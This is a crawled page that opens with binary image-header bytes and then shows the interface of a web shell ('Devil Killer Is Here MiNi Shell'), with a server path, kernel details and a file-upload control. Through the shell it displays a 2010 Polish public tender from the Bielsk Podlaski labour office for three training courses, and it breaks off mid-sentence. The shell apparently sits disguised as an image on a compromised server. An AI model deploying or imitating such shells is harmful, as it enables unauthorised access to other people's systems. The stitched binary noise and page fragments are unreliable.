JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100928/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20100928/309304-N-2010.html

<p class="kh_header"><b>Bielsk Podlaski: Zorganizowanie i przeprowadzenie 3 szkoleń grupowych dla osób bezrobotnych zarejestrowanych w PUP Bielsk Podlaski.</b><br>
<b>Numer ogłoszenia: 309304 - 2010; data zamieszczenia: 28.09.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Powiatowy Urząd Pracy w Bielsku Podlaskim , ul. 3 Maja 17, 17-100 Bielsk Podlaski, woj. podlaskie, tel. 085 7300180,81,82.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http://pupbp.pdt.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Zorganizowanie i przeprowadzenie 3 szkoleń grupowych dla osób bezrobotnych zarejestrowanych w PUP Bielsk Podlaski..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zorganizowanie i przeprowadzenie 3 szkoleń grupowych dla osób bezrobotnych zarejestrowanych w PUP Bielsk Podlaski.

Zamówienie podzielono na 3 części:
Część 1
Zorganizowanie i przeprowadzenie szkolenia w zakresie Serwisant sprzętu komputerowego i urządzeń fiskalnych
Część 2 
Zorganizowanie i przeprowadzenie szkolenia w zakresie Praca z klientem z wykorzystaniem technik komputerowych
Część 3
Zorganizowanie i przeprowadzenie szkolenia w zakresie Kwalifikacja wstępna przyspieszona do prawa jazdy kat. C.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.50.00.00-9, 80.53.31.00-0, 80.51.00.00-2.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 3.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Rozpoczęcie: 18.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>


<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia, że Wykonawca posiada uprawnienie do wykonywania określonej działalności lub czynności, Wykonawca przedstawi:
- oświadczenie, o spełnianiu warunków określone w art. 22 ust. 1 pkt. 1-4 i nie podleganiu wykluczeniu, z przyczyn o których mowa w art. 24 tej ustawy, zgodnie ze wzorem stanowiącym załącznik nr 2 do SIWZ
Ocena spełniania warunku zostanie dokonana według formuły: spełnia - nie spełnia, na podstawie analizy złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia posiadania wiedzy i doświadczenia w zakresie przedmiotu zamówienia Wykonawca przedstawi
- wykaz zrealizowanych szkoleń w zakresie przedmiotu zamówienia w ostatnich trzech latach przed upływem terminu składania ofert, (jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), z podaniem ich przedmiotu, dat realizacji i odbiorców. Na potwierdzenie jakości wykonanych usług Wykonawca dostarcza referencje.
Ocena spełniania warunku zostanie dokonana według formuły: spełnia - nie spełnia, na podstawie analizy złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia dysponowania potencjałem technicznym niezbędnym do realizacji przedmiotu zamówienia Wykonawca wypełni pkt 1 Formularza Ofertowego stanowiącego załącznik nr 1 do SIWZ; w sytuacji, gdy Wykonawca nie dysponuje własną bazą techniczną i sprzętem niezbędnym do realizacji usługi dołącza do oferty stosowne porozumienie z innym podmiotem gospodarczym umożliwiające korzystanie z odpowiedniej bazy technicznej i sprzętu.
Ocena spełniania warunku zostanie dokonana według formuły: spełnia - nie spełnia, na podstawie analizy złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia dysponowania osobami zdolnymi do wykonywania zamówienia Wykonawca przedstawi:
- wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z opisem zakresu wykonywanych przez nie czynności, a w przypadku kadry dydaktycznej Wykonawca załącza do wykazu CV trenerów zawierające informacje na temat wykształcenia, kwalifikacji zawodowych oraz doświadczenia zawodowego pozostającego w korelacji z przedmiotem zamówienia
Ocena spełniania warunku zostanie dokonana według formuły: spełnia - nie spełnia, na podstawie analizy złożonych dokumentów</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>W celu potwierdzenia spełniania tego warunku Wykonawca dostarczy oświadczenie o którym mowa w pkt. III.3.1).
Ocena spełniania warunku zostanie dokonana według formuły: spełnia - nie spełnia, na podstawie analizy złożonych dokumentów</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
</li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

<li style="margin-bottom: 12px;">nie orzeczono wobec niego zakazu ubiegania się o zamówienie - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1.wykaz wykonanych usług w zakresie przedmiotu zamówienia, tj. zrealizowanych szkoleń w zakresie przedmiotu zamówienia w okresie ostatnich trzech lat przed upływem terminu składania ofert, (jeżeli okres prowadzenia działalności jest krótszy - w tym okresie), z podaniem ich przedmiotu, dat wykonania i odbiorców. Na potwierdzenie jakości wykonanych usług Wykonawca dostarcza referencje.
2. wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu zamówienia wraz z opisem zakresu wykonywanych przez nie czynności, a w przypadku kadry dydaktycznej Wykonawca załącza do wykazu CV trenerów zawierające informacje na temat wykształcenia, kwalifikacji zawodowych oraz doświadczenia zawodowego pozostającego w korelacji z przedmiotem zamówienia;
3. aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenie do ewidencji działalności gospodarczej, wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert;
4. pełnomocnictwo - w przypadku gdy Wykonawcę reprezentuje pełnomocnik, z podaniem zakresu pełnomocnictwa i podpisami osób/y reprezentującej Wykonawcę;
5. wypełniony formularz oferty zgodnie ze wzorem stanowiącym załącznik nr 1 do SIWZ
6. szczegółowy program szkolenia zgodnie ze wzorem stanowiącym załącznik nr 3 do SIWZ
7. harmonogram szkolenia
8. formularz cenowy zgodnie ze wzorem stanowiącym załącznik nr 4 do SIWZ
9. w sytuacji, gdy Wykonawca nie dysponuje własną bazą techniczną i sprzętem niezbędnym do realizacji usługi dołącza do oferty stosowne porozumienie z innym podmiotem gospodarczym umożliwiające korzystanie z odpowiedniej bazy technicznej i sprzętu
10. wzory dokumentów, które otrzymają uczestnicy po zakończeniu szkolenia
11. zatwierdzony (parafowany) przez Wykonawcę wzór umowy, stanowiący załącznik nr 5 do SIWZ</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 0.60</li>
<li>2 - Doświadczenie Wykonawcy w organizowaniu szkoleń objętych zamówieniem - 0.30</li>
<li>3 - Posiadanie przez Wykonawcę certyfikatu jakości usług - 0.10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza  zmiany zapisu umowy dotyczące terminu wykonania zamówienia jeśli zaistnieją okoliczności losowe, których Wykonawca  lub Zamawiający nie mógł przewidzieć przed podpisaniem umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://pup-bielsk.pbip.pl  http://pupbp.pdt.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> http://pup-bielsk.pbip.pl  http://pupbp.pdt.pl.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 06.10.2010 godzina 10:00, miejsce: Powiatowy Urząd Pracy w Bielsku Podlaskim
                           ul. 3 Maja 17,
                17-100 Bielsk Podlaski, pokój nr 201.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia w zakresie Serwisant sprzętu komputerowego  i urządzeń fiskalnych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Miejsce szkolenia: Bielsk Podlaski 
2.	Termin szkolenia: październik/listopad 2010 r.
Proponowana data rozpoczęcia szkolenia 18.10.2010 r.
Liczba dni szkolenia: max. 30 dni. Ostateczny termin realizacji szkolenia do 30.11.2010 r.
3.	Wymagana liczba realizowanych godzin zajęć dziennie: 6-8 godz., przeciętnie 30 godzin zegarowych w tygodniu (godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut, długość przerw może być ustalana w sposób elastyczny).
4.	Harmonogram szkolenia powinien obejmować dni powszednie poniedziałek - piątek, zajęcia powinny rozpoczynać się w godzinach porannych. 
5.	Ilość uczestników szkolenia: 8 osób. 
Zajęcia odbywać się powinny w 1 grupie szkoleniowej. 
Łączna liczba godzin zegarowych szkolenia przypadająca na 1 osobę szkoloną musi wynosić: 170 godzin, z czego część praktyczna obejmuje min. 120 godzin.
6.	Program kursu  musi zawierać następujące zagadnienia:
Lp.	Blok tematyczny zajęć edukacyjnych	Wymiar godzin edukacyjnych
1.	Wprowadzenie do tematyki serwisu sprzętu komputerowego i urządzeń fiskalnych (budowa sprzętu, metody, sprzęt i oprogramowanie diagnostyczne, czytanie dokumentacji technicznej związanej 
z urządzeniami komputerowymi i fiskalnymi)	30
2.	Montaż i demontaż, diagnostyka i naprawa: 
-dysków twardych i napędów elastycznych
-płyt głównych - naprawa i aktualizacja BIOS
-urządzeń peryferyjnych (w tym fiskalnych)
-układów zasilania
-zestawów mobilnych ze szczególnym uwzględnieniem laptopów	70
3.	Instalacja i obsługa 
-płyt głównych
-systemów operacyjnych
-instalacja programów użytkowych
-instalacja i serwis urządzeń peryferyjnych	50
4.	Rozbudowa zestawów komputerowych	10
5.	Konfiguracja sieci komputerowych przewodowych 
i bezprzewodowych	10
razem	170
Harmonogram kursu powinien być dostosowany do programu szkolenia, co oznacza iż poszczególne zagadnienia muszą być realizowane w logicznej kolejności.
7.	Program szkolenia powinien być sporządzony z uwzględnieniem Modułowych Programów Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.kwalifikacje.praca.gov.pl) w szczególności dla zawodu technik informatyk o kodzie 312102  i  operator sprzętu komputerowego o kodzie 312201.
8.	Wykonawca zapewni uczestnikom na czas trwania szkolenia konieczny sprzęt oraz bazę lokalową zapewniając warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy 
i p. poż. oraz spełni następujące warunki - 1 uczestnik/ 1 stanowisko komputerowe 
z niezbędnym oprogramowaniem.
9.	Wykonawca zapewni uczestnikom materiały szkoleniowe obejmujące zakres tematyczny szkolenia oraz przybory piśmiennicze przechodzące na własność uczestnika w postaci: notatnika, długopisu, nośnika informacji elektronicznej, itp.
10.	Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu powierzonych jej do realizacji modułów (zagadnień) ujętych w programie szkolenia. Wymagania dotyczące każdego trenera: wykształcenie wyższe (pokrewne do tematyki realizowanych zagadnień), doświadczenie w realizacji co najmniej dwóch kursów z zakresu przedmiotu zamówienia. Wykonawca dołącza do oferty listę trenerów przewidzianych do realizacji przedmiotu zamówienia wraz z ich CV, z których powinno wynikać w sposób oczywisty spełnienie w/w warunków.
Zmiana trenerów wskazanych do realizacji szkolenia możliwa jest tylko w sytuacjach uzasadnionych, których Wykonawca nie mógł przewidzieć i wymaga uzyskania zgody Zamawiającego. Wskazany trener musi posiadać kwalifikacje zgodne z w/w wymaganiami.
Szkolenie powinno zakończyć się oceną nabytych umiejętności oraz wydaniem osobom szkolonym zaświadczeń o ukończeniu kursu na drukach, których wzór określa  Rozporządzenie Ministra Edukacji i Nauki z dn. 03.02.2006 r. w sprawie uzyskiwania 
i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216). Wykonawca musi prowadzić rejestr wydanych zaświadczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.60</li>
<li>2. Doświadczenie Wykonawcy w organizowaniu szkoleń objętych zamówieniem - 0.30</li>
<li>3. Posiadanie przez Wykonawcę certyfikatu jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia w zakresie             Praca z klientem z wykorzystaniem technik komputerowych.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Miejsce szkolenia: Bielsk Podlaski.
2.	Termin szkolenia: październik/listopad 2010 r. 
Proponowana data rozpoczęcia szkolenia 18.10.2010 r. 
Liczba dni szkolenia: max 25 dni szkoleniowych. Ostateczny termin realizacji szkolenia do 30.11.2010 r.
3.	Wymagana liczba realizowanych godzin zajęć dziennie: 6-8 godz., przeciętnie  minimum 30 godzin zegarowych w tygodniu (godzina zegarowa kursu liczy 60 minut i obejmuje zajęcia edukacyjne liczące 45 minut oraz przerwę, liczącą średnio 15 minut, długość przerw może być ustalana w sposób elastyczny). Zajęcia z zakresu obsługi programów komputerowych powinny być realizowane w wymiarze do 6 godzin dziennie.
4.	Harmonogram szkolenia powinien obejmować dni powszednie poniedziałek - piątek. Zajęcia powinny rozpoczynać się w godzinach porannych. 
5.	Ilość uczestników szkolenia: 10 osób. 
Zajęcia odbywać się powinny w 1 grupie szkoleniowej.
6.	Łączna liczba godzin zegarowych szkolenia przypadająca na 1 osobę szkoloną powinna wynosić: 150 godzin, z czego część praktyczna powinna obejmować min. 100 godzin.
7.	Program kursu  musi zawierać następujące zagadnienia:

Lp.	Blok tematyczny zajęć edukacyjnych	Wymiar godzin edukacyjnych
1.	Profesjonalna obsługa klienta, kultura pracy ( w tym m.in. zagadnienia z psychologii i socjologii pracy, zasady efektywnej komunikacji, typologia klientów, zajęcia warsztatowe z bezpośredniej i telefonicznej obsługi klienta,  komunikacji werbalnej i niewerbalnej, warsztat dotyczący kreowania wizerunku zewnętrznego - praca ze stylistą)	50
2.	Organizacja pracy administracyjno-biurowej (m.in. klasyfikacja dokumentacji, przechowywanie dokumentacji, obieg dokumentów, wybrane zagadnienia z KPA)	10
3.	Obsługa programów komputerowych (edytor tekstu Microsoft Word, arkusz kalkulacyjny Microsoft Excel, Microsoft PowerPoint, obsługa przeglądarek internetowych, poczta internetowa)	80
4.	Obsługa urządzeń biurowych, korzystanie z urządzeń peryferyjnych	10
razem	150
Harmonogram kursu powinien być dostosowany do programu szkolenia, co oznacza iż poszczególne zagadnienia muszą być realizowane w logicznej kolejności.
8.	Program szkolenia powinien być sporządzony z uwzględnieniem Modułowych Programów Szkolenia Zawodowego Ministerstwa Pracy i Polityki Społecznej (www.kwalifikacje.praca.gov.pl) w szczególności  z uwzględnieniem wybranych zagadnień programów dla zawodu operator sprzętu komputerowego o kodzie (312201), sekretarka o kodzie (411101) i agent ubezpieczeniowy o kodzie (341201).
9.	Wykonawca zapewni uczestnikom na czas trwania szkolenia konieczny sprzęt oraz bazę lokalową zapewniając warunki pracy zgodne z przepisami bezpieczeństwa i higieny pracy 
i p. poż. oraz spełni następujący warunek - 1 uczestnik/ 1 stanowisko komputerowe 
z niezbędnym oprogramowaniem.
10.	Wykonawca zapewni uczestnikom materiały szkoleniowe obejmujące zakres tematyczny szkolenia oraz przybory piśmiennicze przechodzące na własność uczestnika w postaci: notatnika, długopisu, nośnika informacji elektronicznej, itp.
11.	Kadra dydaktyczna powinna posiadać kwalifikacje i doświadczenie w prowadzeniu powierzonych jej do realizacji modułów (zagadnień) ujętych w programie szkolenia. Wymaganym doświadczeniem każdego trenera jest przeprowadzenie co najmniej dwóch kursów z zakresu przedmiotu zamówienia. Wszyscy trenerzy przewidziani do realizacji szkolenia powinni posiadać wykształcenie wyższe, z wyjątkiem osoby przewidzianej do realizacji warsztatu dotyczącego kreowania wizerunku zewnętrznego, która powinna posiadać wykształcenie minimum średnie oraz minimum 2 letni staż pracy w zawodzie obejmującym wykonywanie zadań wizażysty/stylisty. Wykonawca dołącza do oferty listę trenerów przewidzianych do realizacji przedmiotu zamówienia wraz z ich CV, z których powinno wynikać w sposób oczywisty spełnienie w/w warunków. 
Zmiana trenerów wskazanych do realizacji szkolenia możliwa jest tylko w sytuacjach uzasadnionych, których Wykonawca nie mógł przewidzieć i wymaga uzyskania zgody Zamawiającego. Wskazany trener musi posiadać kwalifikacje zgodne z w/w wymaganiami.
Szkolenie powinno zakończyć się oceną nabytych umiejętności oraz wydaniem osobom szkolonym zaświadczeń o ukończeniu kursu na drukach, których wzór określa  Rozporządzenie Ministra Edukacji i Nauki z dn. 03.02.2006 r. w sprawie uzyskiwania 
i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. Nr 31, poz. 216). Wykonawca musi prowadzić rejestr wydanych zaświadczeń..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Rozpoczęcie: 18.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 0.60</li>
<li>2. Doświadczenie Wykonawcy w organizowaniu szkoleń objętych zamówieniem - 0.30</li>
<li>3. Posiadanie przez Wykonawcę certyfikatu jakości usług - 0.10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Zorganizowanie i przeprowadzenie szkolenia w zakresie             Kwalifikacja wstępna przyspieszona do prawa jazdy kat. C wraz z organizacją testu kwalifikacyjnego.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.	Miejsce szkolenia: Ośrodek szkolenia kierowców spełniający wymagania zawarte 
